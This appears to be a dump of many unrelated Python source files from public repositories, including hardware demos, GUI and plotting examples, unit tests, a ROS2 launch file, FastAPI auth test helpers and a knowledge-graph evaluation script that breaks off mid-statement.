eeryinkblot/psmoveapi
306
12686902
# # PS Move API - An interface for the PS Move Motion Controller # Copyright (c) 2011 <NAME> <<EMAIL>> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # """ Pulsating light demo Press the Move button at the first beat, then press it again after 4 beats. Watch the sphere glow up to the beat. Keep SQUARE pressed to let it glow up every 2 beats. Keep TRIANGLE pressed to let it glow up every beat. Press the Move button to reset, then start again (first beat, 4th beat, ...). """ import sys import os sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'build')) import time import math import psmove if psmove.count_connected() < 1: print('No controller connected') sys.exit(1) move = psmove.PSMove() move.set_rate_limiting(1) if move.connection_type != psmove.Conn_Bluetooth: print('Please connect controller via Bluetooth') sys.exit(1) current_beat = 0 old_buttons = 0 last_blink = 0 intensity = 0 divisor = 1 last_decrease = 0 while True: while move.poll(): buttons = move.get_buttons() if buttons & psmove.Btn_MOVE and not old_buttons & psmove.Btn_MOVE: print time.time(), 'press' if current_beat == 0: print 'init' current_beat = time.time() elif current_beat < 10000: print 'reset' current_beat = 0 else: print 'run!' current_beat = time.time() - current_beat last_blink = time.time() if buttons & psmove.Btn_TRIANGLE: divisor = 4 elif buttons & psmove.Btn_SQUARE: divisor = 2 else: divisor = 1 old_buttons = buttons intensity *= .9999 if current_beat > 0 and current_beat < 10000: if last_blink == 0 or last_blink + (current_beat/divisor) < time.time(): last_blink += current_beat/divisor print current_beat, 'blink' intensity = 255. move.set_leds(*map(int, [intensity]*3)) move.update_leds()
Chapter07/question_5_example_code.py
trappn/Mastering-GUI-Programming-with-Python
138
12686913
<gh_stars>100-1000 from PyQt5 import QtWidgets as qtw from PyQt5 import QtCore as qtc from PyQt5 import QtMultimedia as qtmm from PyQt5 import QtMultimediaWidgets as qtmmw class MainWindow(qtw.QWidget): def __init__(self): super().__init__() self.setLayout(qtw.QVBoxLayout()) # camera self.camera = qtmm.QCamera() # viewfinder cvf = qtmmw.QCameraViewfinder() self.camera.setViewfinder(cvf) self.layout().addWidget(cvf) # Form form = qtw.QFormLayout() self.layout().addLayout(form) # zoom zoomslider = qtw.QSlider( minimum=1, maximum=10, sliderMoved=self.on_slider_moved, orientation=qtc.Qt.Horizontal ) form.addRow('Zoom', zoomslider) self.camera.start() self.show() def on_slider_moved(self, value): focus = self.camera.focus() focus.zoomTo(1, value) if __name__ == '__main__': app = qtw.QApplication([]) mw = MainWindow() app.exec()
binproperty/apps.py
wh8983298/GreaterWMS
1,063
12686927
<filename>binproperty/apps.py from django.apps import AppConfig from django.db.models.signals import post_migrate class BinpropertyConfig(AppConfig): name = 'binproperty' def ready(self): post_migrate.connect(do_init_data, sender=self) def do_init_data(sender, **kwargs): init_category() def init_category(): """ :return:None """ try: from .models import ListModel as ls if ls.objects.filter(openid__iexact='init_data').exists(): if ls.objects.filter(openid__iexact='init_data').count() != 4: ls.objects.filter(openid__iexact='init_data').delete() init_data = [ ls(id=1, openid='init_data', bin_property='Damage', creater='GreaterWMS'), ls(id=2, openid='init_data', bin_property='Inspection', creater='GreaterWMS'), ls(id=3, openid='init_data', bin_property='Normal', creater='GreaterWMS'), ls(id=4, openid='init_data', bin_property='Holding', creater='GreaterWMS') ] ls.objects.bulk_create(init_data, batch_size=100) else: init_data = [ ls(id=1, openid='init_data', bin_property='Damage', creater='GreaterWMS'), ls(id=2, openid='init_data', bin_property='Inspection', creater='GreaterWMS'), ls(id=3, openid='init_data', bin_property='Normal', creater='GreaterWMS'), ls(id=4, openid='init_data', bin_property='Holding', creater='GreaterWMS') ] ls.objects.bulk_create(init_data, batch_size=100) except: pass
samples/utilityimageformatconverter.py
matt-phair/pypylon
358
12686933
<reponame>matt-phair/pypylon<filename>samples/utilityimageformatconverter.py # Note: Before getting started, Basler recommends reading the Programmer's Guide topic # in the pylon C++ API documentation that gets installed with pylon. # If you are upgrading to a higher major version of pylon, Basler also # strongly recommends reading the Migration topic in the pylon C++ API documentation. # This sample illustrates how to use the image format # converter class CImageFormatConverter. # The image format converter accepts all image formats # produced by Basler camera devices and it is able to # convert these to a number of output formats. # The conversion can be controlled by several parameters. # See the converter class documentation for more details. from pypylon import pylon from pypylon import genicam # This is a helper function for showing an image on the screen if Windows is used, # and for printing the first bytes of the image. def show_image(image, message): print(message) pBytes = image.Array print("Bytes of the image: \n") print(pBytes) try: # Create the converter and set parameters. converter = pylon.ImageFormatConverter() converter.OutputPixelFormat = pylon.PixelType_Mono8 # Try to get a grab result for demonstration purposes. print("Waiting for an image to be grabbed.") try: camera = pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice()) grabResult = camera.GrabOne(1000) show_image(grabResult, "Grabbed image.") targetImage = pylon.PylonImage.Create(pylon.PixelType_Mono8, grabResult.GetWidth(), grabResult.GetHeight()); print(converter.IsSupportedOutputFormat(pylon.PixelType_Mono8)) # Now we can check if conversion is required. if converter.ImageHasDestinationFormat(grabResult): # No conversion is needed. It can be skipped for saving processing # time. show_image(grabResult, "Grabbed image.") else: # Conversion is needed. show_image(grabResult, "Grabbed image.") show_image(targetImage, "Converted image.") except genicam.GenericException as e: print("Could not grab an image: ", e.GetDescription()) except genicam.GenericException as e: print("An exception occurred. ", e.GetDescription())
tests/zoomus/components/live_stream/test_update.py
seantibor/zoomus
178
12686934
import unittest from zoomus import components, util import responses def suite(): """Define all the tests of the module.""" suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(UpdateV2TestCase)) return suite class UpdateV2TestCase(unittest.TestCase): def setUp(self): self.component = components.live_stream.LiveStreamComponentV2( base_uri="http://foo.com", config={ "api_key": "KEY", "api_secret": "SECRET", "version": util.API_VERSION_2, }, ) @responses.activate def test_can_update(self): responses.add(responses.PATCH, "http://foo.com/meetings/42/livestream") response = self.component.update( meeting_id="42", stream_url="https://foo.bar", stream_key="12345" ) self.assertEqual( response.request.body, '{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}', ) @responses.activate def test_can_update_wildcard(self): responses.add(responses.PATCH, "http://foo.com/meetings/42/livestream") data = { "meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345", } response = self.component.update(**data) self.assertEqual( response.request.body, '{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}', ) def test_requires_meeting_id(self): with self.assertRaises(ValueError) as context: self.component.update() self.assertEqual(context.exception.message, "'meeting_id' must be set") if __name__ == "__main__": unittest.main()
env/Lib/site-packages/OpenGL/raw/GLES2/EXT/render_snorm.py
5gconnectedbike/Navio2
210
12686946
<filename>env/Lib/site-packages/OpenGL/raw/GLES2/EXT/render_snorm.py '''Autogenerated by xml_generate script, do not edit!''' from OpenGL import platform as _p, arrays # Code generation uses this from OpenGL.raw.GLES2 import _types as _cs # End users want this... from OpenGL.raw.GLES2._types import * from OpenGL.raw.GLES2 import _errors from OpenGL.constant import Constant as _C import ctypes _EXTENSION_NAME = 'GLES2_EXT_render_snorm' def _f( function ): return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_EXT_render_snorm',error_checker=_errors._error_checker) GL_BYTE=_C('GL_BYTE',0x1400) GL_R16_SNORM_EXT=_C('GL_R16_SNORM_EXT',0x8F98) GL_R8_SNORM=_C('GL_R8_SNORM',0x8F94) GL_RG16_SNORM_EXT=_C('GL_RG16_SNORM_EXT',0x8F99) GL_RG8_SNORM=_C('GL_RG8_SNORM',0x8F95) GL_RGBA16_SNORM_EXT=_C('GL_RGBA16_SNORM_EXT',0x8F9B) GL_RGBA8_SNORM=_C('GL_RGBA8_SNORM',0x8F97) GL_SHORT=_C('GL_SHORT',0x1402)
examples/GridEYE_test.py
timgates42/PyBBIO
102
12686961
""" GridEYE_test.py <NAME> <<EMAIL>> Example program for PyBBIO's GridEYE library. This example program is in the public domain. """ from bbio import * from bbio.libraries.GridEYE import GridEYE # Initialize the I2C bus: I2C1.open() # Create a GridEYE object: grideye = GridEYE(I2C1) ambient = grideye.getAmbientTemp() frame = grideye.getFrame() print "ambient temp: {:0.1f}C".format(ambient) print "sensor temp:" for y in range(8): string = "" for x in range(8): string += " {:5.1f}".format(frame[y*8+x]) print string
webots_ros2_epuck/launch/robot_launch.py
zegangYang/webots_ros2
176
12686968
<reponame>zegangYang/webots_ros2 #!/usr/bin/env python # Copyright 1996-2021 Cyberbotics Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Launch Webots e-puck driver.""" import os import pathlib import launch from launch.substitutions import LaunchConfiguration from launch.actions import DeclareLaunchArgument from launch.substitutions.path_join_substitution import PathJoinSubstitution from launch_ros.actions import Node from launch import LaunchDescription from ament_index_python.packages import get_package_share_directory from webots_ros2_driver.webots_launcher import WebotsLauncher def generate_launch_description(): package_dir = get_package_share_directory('webots_ros2_epuck') world = LaunchConfiguration('world') robot_description = pathlib.Path(os.path.join(package_dir, 'resource', 'epuck_webots.urdf')).read_text() ros2_control_params = os.path.join(package_dir, 'resource', 'ros2_control.yml') use_sim_time = LaunchConfiguration('use_sim_time', default=True) webots = WebotsLauncher( world=PathJoinSubstitution([package_dir, 'worlds', world]) ) controller_manager_timeout = ['--controller-manager-timeout', '50'] controller_manager_prefix = 'python.exe' if os.name == 'nt' else '' diffdrive_controller_spawner = Node( package='controller_manager', executable='spawner.py', output='screen', prefix=controller_manager_prefix, arguments=['diffdrive_controller'] + controller_manager_timeout, parameters=[ {'use_sim_time': use_sim_time}, ], ) joint_state_broadcaster_spawner = Node( package='controller_manager', executable='spawner.py', output='screen', prefix=controller_manager_prefix, arguments=['joint_state_broadcaster'] + controller_manager_timeout, parameters=[ {'use_sim_time': use_sim_time}, ], ) epuck_driver = Node( package='webots_ros2_driver', executable='driver', output='screen', parameters=[ {'robot_description': robot_description, 'use_sim_time': use_sim_time}, ros2_control_params ], remappings=[ ('/diffdrive_controller/cmd_vel_unstamped', '/cmd_vel'), ] ) epuck_process = Node( package='webots_ros2_epuck', executable='epuck_node', output='screen', parameters=[ {'use_sim_time': use_sim_time}, ], ) robot_state_publisher = Node( package='robot_state_publisher', executable='robot_state_publisher', output='screen', parameters=[{ 'robot_description': '<robot name=""><link name=""/></robot>' }], ) footprint_publisher = Node( package='tf2_ros', executable='static_transform_publisher', output='screen', arguments=['0', '0', '0', '0', '0', '0', 'base_link', 'base_footprint'], ) return LaunchDescription([ DeclareLaunchArgument( 'world', default_value='epuck_world.wbt', description='Choose one of the world files from `/webots_ros2_epuck/world` directory' ), joint_state_broadcaster_spawner, diffdrive_controller_spawner, webots, robot_state_publisher, epuck_driver, footprint_publisher, epuck_process, # This action will kill all nodes once the Webots simulation has exited launch.actions.RegisterEventHandler( event_handler=launch.event_handlers.OnProcessExit( target_action=webots, on_exit=[launch.actions.EmitEvent(event=launch.events.Shutdown())], ) ) ])
eventsourcing/examples/aggregate8/application.py
bibz/eventsourcing
107
12686994
<filename>eventsourcing/examples/aggregate8/application.py from typing import Any, Dict from uuid import UUID from eventsourcing.application import Application from eventsourcing.examples.aggregate8.domainmodel import Dog, Snapshot from eventsourcing.examples.aggregate8.persistence import ( OrjsonTranscoder, PydanticMapper, ) from eventsourcing.persistence import Mapper, Transcoder class DogSchool(Application): env = { "AGGREGATE_CACHE_MAXSIZE": "50", "DEEPCOPY_FROM_AGGREGATE_CACHE": "n", "IS_SNAPSHOTTING_ENABLED": "y", } snapshot_class = Snapshot def register_dog(self, name: str) -> UUID: dog = Dog(name) self.save(dog) return dog.id def add_trick(self, dog_id: UUID, trick: str) -> None: dog: Dog = self.repository.get(dog_id) dog.add_trick(trick) self.save(dog) def get_dog(self, dog_id: UUID) -> Dict[str, Any]: dog: Dog = self.repository.get(dog_id) return {"name": dog.name, "tricks": tuple(dog.tricks)} def construct_mapper(self) -> Mapper: return self.factory.mapper( transcoder=self.construct_transcoder(), mapper_class=PydanticMapper, ) def construct_transcoder(self) -> Transcoder: return OrjsonTranscoder()
Demo/Network/tcp-echo-client.py
zaklaus/Shrine
1,227
12687031
#!/usr/bin/env python3 import socket import sys HOST = sys.argv[1] PORT = int(sys.argv[2]) MESSAGE = sys.argv[3] with socket.create_connection((HOST, PORT)) as s: s.sendall(MESSAGE.encode()) data = s.recv(1024) if data: print('Received', data.decode())
tests/keras_contrib/optimizers/ftml_test.py
congson1293/keras-contrib
1,335
12687070
from __future__ import print_function import pytest from keras_contrib.utils.test_utils import is_tf_keras from keras_contrib.tests import optimizers from keras_contrib.optimizers import ftml @pytest.mark.xfail(is_tf_keras, reason='TODO fix this.', strict=True) def test_ftml(): optimizers._test_optimizer(ftml()) optimizers._test_optimizer(ftml(lr=0.003, beta_1=0.8, beta_2=0.9, epsilon=1e-5, decay=1e-3))
examples/python/extras/test_o3d.py
JeremyBYU/polylidar
149
12687071
<gh_stars>100-1000 """Demo of Open3D 0.10.0 Slowdown Please modify DIRECTORY to point to the folder of meshes attached to this issue reply """ import os import open3d as o3d import copy DIRECTORY = 'fixtures/o3d_slow_down' # o3d 0.10.0 - 9 Seconds to load meshes (time to being user interation), 1 FPS (with draw edges enabled 'w') # o3d 0.11.0+f1d478c4 - 0.5 seconds, 45-60 FPS (with draw edges) duplicate = 50 def main(): all_meshes = [] all_files = sorted(list(os.listdir(DIRECTORY))) for filename in all_files: print(filename) mesh = o3d.io.read_triangle_mesh(os.path.join(DIRECTORY, filename)) all_meshes.extend([ copy.deepcopy(mesh) for i in range(duplicate)]) print(len(all_meshes)) o3d.visualization.draw_geometries(all_meshes) if __name__ == "__main__": main()
tests/test_ihex.py
CreativeLau/stcgal
469
12687076
# # Copyright (c) 2021 <NAME> <<EMAIL>> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # import unittest import stcgal.ihex class IHEXTests(unittest.TestCase): """Tests for IHEX reader""" def test_simple(self): """Test reading a basic, valid file""" lines = [ b":0B00000068656C6C6F5F776F726C645A", b":00000001FF" ] bindata = stcgal.ihex.IHex.read(lines).extract_data() self.assertEqual(bindata, b"hello_world") def test_empty(self): """Test reading an empty file""" lines = [] bindata = stcgal.ihex.IHex.read(lines).extract_data() self.assertEqual(bindata, b"") def test_invalid(self): """Test invalid encoded data""" lines = [ ":abc" ] with self.assertRaises(ValueError): stcgal.ihex.IHex.read(lines) def test_roundtrip(self): """Test round-trip through encoder/decoder""" bindata = b"12345678" for mode in (8, 16, 32): with self.subTest(mode): hexer = stcgal.ihex.IHex() hexer.set_mode(mode) hexer.insert_data(0, bindata) encoded = hexer.write().encode("ASCII").splitlines() decoded = stcgal.ihex.IHex.read(encoded).extract_data() self.assertEqual(decoded, bindata)
foundations_ui/cypress/fixtures/atlas_scheduler/project_name/with_job_config_project/main.py
DeepLearnI/atlas
296
12687083
<gh_stars>100-1000 import foundations import sys foundations.log_metric("Task", sys.argv[1])
python/herbstluftwm/types.py
ju-sh/herbstluftwm
925
12687093
<gh_stars>100-1000 import re """ Module containing types used in the communication with herbstluftwm; primarily, types used in attributes. """ class Point: """ A point on the 2D plane """ def __init__(self, x=0, y=0): self.x = x self.y = y def __add__(self, other): return Point(self.x + other.x, self.y + other.y) def __sub__(self, other): return Point(self.x - other.x, self.y - other.y) def __mul__(self, scalar): """multiply with a given scalar""" return Point(self.x * scalar, self.y * scalar) def __floordiv__(self, scalar): """divide by scalar factor, forcing to integer coordinates""" return Point(self.x // scalar, self.y // scalar) def __eq__(self, other): return self.x == other.x and self.y == other.y def __repr__(self) -> str: return f'Point({self.x}, {self.y})' class Rectangle: """ A rectangle on the screen, defined by its size and its distance to the top left screen corner. """ def __init__(self, x=0, y=0, width=0, height=0): self.x = x self.y = y self.width = width self.height = height def __str__(self): return f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})' def __repr__(self): return f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})' def __eq__(self, other): return self.x == other.x \ and self.y == other.y \ and self.width == other.width \ and self.height == other.height def to_user_str(self): return "%dx%d%+d%+d" % (self.width, self.height, self.x, self.y) @staticmethod def from_user_str(string): reg = '([0-9]+)x([0-9]+)([+-][0-9]+)([+-][0-9]+)' m = re.match(reg, string) if m is None: raise Exception(f'"{string}" is not in format {reg}') w = int(m.group(1)) h = int(m.group(2)) x = int(m.group(3)) y = int(m.group(4)) return Rectangle(x, y, w, h) def adjusted(self, dx=0, dy=0, dw=0, dh=0): """return a new rectangle whose components are adjusted by the provided deltas. """ return Rectangle(self.x + dx, self.y + dy, self.width + dw, self.height + dh) def topleft(self) -> Point: """the top left corner of the rectangle""" return Point(self.x, self.y) def bottomright(self) -> Point: """the bottom right corner of the rectangle""" return Point(self.x + self.width, self.y + self.height) def center(self) -> Point: """the center of the rectangle, forced to integer coordinates""" return self.topleft() + self.size() // 2 def size(self) -> Point: """width and height of the rectangle""" return Point(self.width, self.height) class HlwmType: """ Wrapper functions for converting between python types and types in herbstluftwm. """ def __init__(self, name, from_user_str, to_user_str, is_instance): # a hlwm type should define the following self.name = name # type: str # a callback for parsing self.from_user_str = from_user_str # of type: str -> T # a callback for printing self.to_user_str = to_user_str # of type: T -> str # a predicate whether a python variable has this type: self.is_instance = is_instance # of type: Anything -> bool @staticmethod def by_name(type_name): """Given the full name of a hlwm type, return the metadata python type""" for t in hlwm_types(): if t.name == type_name: return t return None @staticmethod def by_type_of_variable(python_variable): """Given a variable, detect its type """ for t in hlwm_types(): if t.is_instance(python_variable): return t return None def hlwm_types(): """ Return a list of HlwmType objects. Unfortunately, the order matters for the is_instance() predicate: Here, the first matching type in the list must be used. (This is because `isinstance(True, int)` is true) """ types = [ HlwmType(name='bool', from_user_str=bool_from_user_str, to_user_str=lambda b: 'true' if b else 'false', is_instance=lambda x: isinstance(x, bool)), HlwmType(name='int', from_user_str=int, to_user_str=str, is_instance=lambda x: isinstance(x, int)), # there is no uint in python, so we just convert it to 'int' HlwmType(name='uint', from_user_str=int, to_user_str=str, is_instance=lambda x: False), HlwmType(name='rectangle', from_user_str=Rectangle.from_user_str, to_user_str=Rectangle.to_user_str, is_instance=lambda x: isinstance(x, Rectangle)), HlwmType(name='string', from_user_str=lambda x: x, to_user_str=lambda x: x, is_instance=lambda x: isinstance(x, str)), ] return types def bool_from_user_str(bool_string): """Parse a string description of a hlwm boolean to a python boolean""" if bool_string.lower() in ['true', 'on']: return True if bool_string.lower() in ['false', 'off']: return False raise Exception(f'"{bool_string}" is not a boolean')
extraPackages/matplotlib-3.0.3/examples/mplot3d/3d_bars.py
dolboBobo/python3_ios
130
12687101
<filename>extraPackages/matplotlib-3.0.3/examples/mplot3d/3d_bars.py<gh_stars>100-1000 """ ===================== Demo of 3D bar charts ===================== A basic demo of how to plot 3D bars with and without shading. """ import numpy as np import matplotlib.pyplot as plt # This import registers the 3D projection, but is otherwise unused. from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import # setup the figure and axes fig = plt.figure(figsize=(8, 3)) ax1 = fig.add_subplot(121, projection='3d') ax2 = fig.add_subplot(122, projection='3d') # fake data _x = np.arange(4) _y = np.arange(5) _xx, _yy = np.meshgrid(_x, _y) x, y = _xx.ravel(), _yy.ravel() top = x + y bottom = np.zeros_like(top) width = depth = 1 ax1.bar3d(x, y, bottom, width, depth, top, shade=True) ax1.set_title('Shaded') ax2.bar3d(x, y, bottom, width, depth, top, shade=False) ax2.set_title('Not Shaded') plt.show()
pymol/pymol_example_plugin.py
whitmans-max/python-examples
140
12687129
#!/usr/bin/env python2 # plugin can't have `-` in filename # `pymol-example-plugin.py` will not work # `pymol_example_plugin.py` will work import Tkinter as tk import tkMessageBox import pymol class ExamplePlugin: def __init__(self, parent): self.parent = parent # window win = tk.Toplevel(self.parent) win.title('Example Plugin') # label b = tk.Label(win, text='Select option') b.pack() # checkbuttons self.var = tk.IntVar() self.cb = tk.Checkbutton(win, text='OFF', indicatoron=0, variable=self.var, command=self.toggle) self.cb.pack() # button b = tk.Button(win, text='Close', command=win.destroy) b.pack() def toggle(self): if self.var.get(): text = 'selected' # change text on checkbutton self.cb['text'] = 'ON' else: text = 'unselected' # change text on checkbutton self.cb['text'] = 'OFF' tkMessageBox.showinfo('Selection status', text) def show(): # it can work without `parent` # but `parent` may give access to parent window # (but I don't know if it is usefull) parent = pymol.plugins.get_tk_root() ExamplePlugin(parent) def __init__(self): # add to menu `Plugin` self.menuBar.addmenuitem('Plugin', 'command', label='Example Plugin', command=show) # create command 'ExamplePlugin' for `PyMOL>` pymol.cmd.extend('ExamplePlugin', show) # create shortcut which works in `Viewer` pymol.cmd.set_key('CTRL-F', show) # show plugin window at start (if you need it) show()
maml/utils/_typing.py
anooptp/maml
367
12687142
"""Define several typing for convenient use""" from typing import Union, Callable, Optional, Any, List import numpy as np from pymatgen.core import Structure, Molecule OptStrOrCallable = Optional[Union[str, Callable[..., Any]]] StructureOrMolecule = Union[Structure, Molecule] VectorLike = Union[List[float], np.ndarray]
tests/helpers.py
jleclanche/fastapi-cloudauth
198
12687147
<gh_stars>100-1000 import base64 import json from dataclasses import dataclass from typing import Any, Dict, Iterable, List, Tuple import pytest from fastapi import HTTPException from fastapi.security import HTTPAuthorizationCredentials from fastapi.testclient import TestClient from pydantic.main import BaseModel from requests.models import Response from fastapi_cloudauth.base import ScopedAuth, UserInfoAuth from fastapi_cloudauth.verification import JWKsVerifier @dataclass class Auths: protect_auth: ScopedAuth protect_auth_ne: ScopedAuth ms_auth: UserInfoAuth ms_auth_ne: UserInfoAuth invalid_ms_auth: UserInfoAuth invalid_ms_auth_ne: UserInfoAuth valid_claim: BaseModel invalid_claim: BaseModel class BaseTestCloudAuth: """ Required setup: initialize test case teardown: del items for test decode: check decoded token and assigned info """ ACCESS_TOKEN = "" SCOPE_ACCESS_TOKEN = "" ID_TOKEN = "" TESTAUTH: Auths def setup(self, scope: Iterable[str]) -> None: ... # pragma: no cover def teardown(self) -> None: ... # pragma: no cover def decode(self) -> None: ... # pragma: no cover def assert_get_response( client: TestClient, endpoint: str, token: str, status_code: int, detail: str = "" ) -> Response: if token: headers = {"authorization": f"Bearer {token}"} else: headers = {} response = client.get(endpoint, headers=headers) assert response.status_code == status_code, f"{response.json()}" if detail: assert response.json().get("detail", "") == detail return response def _assert_verifier(token, verifier: JWKsVerifier) -> HTTPException: http_auth = HTTPAuthorizationCredentials(scheme="a", credentials=token) with pytest.raises(HTTPException) as e: verifier._verify_claims(http_auth) return e.value def _assert_verifier_no_error(token, verifier: JWKsVerifier) -> None: http_auth = HTTPAuthorizationCredentials(scheme="a", credentials=token) assert verifier._verify_claims(http_auth) is False def decode_token(token: str) -> Tuple[Dict[str, Any], Dict[str, Any], List[str]]: header, payload, *rest = token.split(".") header += f"{'=' * (len(header) % 4)}" payload += f"{'=' * (len(payload) % 4)}" _header = json.loads(base64.b64decode(header).decode()) _payload = json.loads(base64.b64decode(payload).decode()) return _header, _payload, rest
CapsE/evalCapsE.py
MedyG/kg-reeval
104
12687153
import tensorflow as tf from scipy.stats import rankdata import numpy as np import os import time import datetime from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter from builddata_softplus import * from capsuleNet import CapsE # Parameters # ================================================== parser = ArgumentParser("CapsE", formatter_class=ArgumentDefaultsHelpFormatter, conflict_handler='resolve') parser.add_argument("--data", default="./data/", help="Data sources.") parser.add_argument("--run_folder", default="./", help="Data sources.") parser.add_argument("--name", default="WN18RR", help="Name of the dataset.") parser.add_argument("--embedding_dim", default=100, type=int, help="Dimensionality of character embedding (default: 128)") parser.add_argument("--filter_size", default=1, type=int, help="Comma-separated filter sizes (default: '3,4,5')") parser.add_argument("--num_filters", default=400, type=int, help="Number of filters per filter size (default: 128)") parser.add_argument("--learning_rate", default=0.00001, type=float, help="Learning rate") parser.add_argument("--batch_size", default=128, type=int, help="Batch Size") parser.add_argument("--neg_ratio", default=1.0, help="Number of negative triples generated by positive (default: 1.0)") parser.add_argument("--useInitialization", default=True, type=bool, help="Using the pretrained embeddings") parser.add_argument("--num_epochs", default=51, type=int, help="Number of training epochs") parser.add_argument("--savedEpochs", default=10, type=int, help="") parser.add_argument("--allow_soft_placement", default=True, type=bool, help="Allow device soft device placement") parser.add_argument("--log_device_placement", default=False, type=bool, help="Log placement of ops on devices") parser.add_argument("--model_name", default='wn18rr_400_4', help="") parser.add_argument("--useConstantInit", action='store_true') parser.add_argument('--iter_routing', default=1, type=int, help='number of iterations in routing algorithm') parser.add_argument('--num_outputs_secondCaps', default=1, type=int, help='') parser.add_argument('--vec_len_secondCaps', default=10, type=int, help='') parser.add_argument("--model_index", default='30') parser.add_argument("--num_splits", default=8, type=int) parser.add_argument("--testIdx", default=1, type=int, help="From 0 to 7") parser.add_argument("--decode", action='store_false') args = parser.parse_args() print(args) # Load data print("Loading data...") train, valid, test, words_indexes, indexes_words, \ headTailSelector, entity2id, id2entity, relation2id, id2relation = build_data(path=args.data, name=args.name) data_size = len(train) train_batch = Batch_Loader(train, words_indexes, indexes_words, headTailSelector, \ entity2id, id2entity, relation2id, id2relation, batch_size=args.batch_size, neg_ratio=args.neg_ratio) entity_array = np.array(list(train_batch.indexes_ents.keys())) initialization = [] if args.useInitialization == True: print("Using pre-trained initialization.") initialization = np.empty([len(words_indexes), args.embedding_dim]).astype(np.float32) initEnt, initRel = init_norm_Vector(args.data + args.name + '/relation2vec' + str(args.embedding_dim) + '.init', args.data + args.name + '/entity2vec' + str(args.embedding_dim) + '.init', args.embedding_dim) for _word in words_indexes: if _word in relation2id: index = relation2id[_word] _ind = words_indexes[_word] initialization[_ind] = initRel[index] elif _word in entity2id: index = entity2id[_word] _ind = words_indexes[_word] initialization[_ind] = initEnt[index] else: print('*****************Error********************!') break initialization = np.array(initialization, dtype=np.float32) assert len(words_indexes) % (len(entity2id) + len(relation2id)) == 0 print("Loading data... finished!") x_valid = np.array(list(valid.keys())).astype(np.int32) y_valid = np.array(list(valid.values())).astype(np.float32) len_valid = len(x_valid) batch_valid = int(len_valid / (args.num_splits - 1)) x_test = np.array(list(test.keys())).astype(np.int32) y_test = np.array(list(test.values())).astype(np.float32) len_test = len(x_test) batch_test = int(len_test / (args.num_splits - 1)) # uncomment when tuning hyper-parameters on the validation set # x_test = x_valid # y_test = y_valid # len_test = len_valid # batch_test = batch_valid ########################################## if args.decode == False: lstModelNames = list(args.model_name.split(",")) for _model_name in lstModelNames: out_dir = os.path.abspath(os.path.join(args.run_folder, "runs_CapsE", _model_name)) print("Evaluating {}\n".format(out_dir)) checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints")) checkpoint_prefix = os.path.join(checkpoint_dir, "model") lstModelIndexes = list(args.model_index.split(",")) for _model_index in lstModelIndexes: _file = checkpoint_prefix + "-" + _model_index lstHT = [] for _index in range(args.num_splits): with open(_file + '.eval.' + str(_index) + '.txt') as f: for _line in f: if _line.strip() != '': lstHT.append(list(map(float, _line.strip().split()))) lstHT = np.array(lstHT) print(_file, 'mr, mrr, hits@1, hits@10 --> ', np.sum(lstHT, axis=0) / (2 * len_test)) print('------------------------------------') else: with tf.Graph().as_default(): tf.set_random_seed(1234) session_conf = tf.ConfigProto(allow_soft_placement=args.allow_soft_placement, log_device_placement=args.log_device_placement) session_conf.gpu_options.allow_growth = True sess = tf.Session(config=session_conf) with sess.as_default(): global_step = tf.Variable(0, name="global_step", trainable=False) capse = CapsE(sequence_length=x_valid.shape[1], initialization=initialization, embedding_size=args.embedding_dim, 